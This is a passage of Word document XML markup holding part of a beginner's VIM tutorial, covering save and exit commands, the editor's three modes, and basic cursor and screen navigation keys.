          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save and exit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:wq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="927"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit without saving: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:q!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8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89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Modes in VIM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VIM has three primary modes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Normal mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Default mode for navigation and commands. Press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Esc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enter this mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insert mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: For text editing. Press </w:t>
      </w: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 to start inserting text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: For saving, exiting, or running commands. Press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to enter command mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8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90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B91">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Basic Navigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the cursor:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Left</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Right</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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j</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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k</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move by words:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Next word</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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b</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Previous word</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move to line start/end:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Beginning of the line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1204"/>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End of the line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to specific line: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:&lt;line_number&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to go to line 10)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1204"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> :set number</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to temporarily see line numbers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B9F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the cursor to the begin/end of file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start of file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">End of file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">G</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">around the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">screen</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Highest line on the screen: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">H</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Middle line on the screen: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">M</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lowest line on the screen: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">screen </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">around:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the screen to the top of the window: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
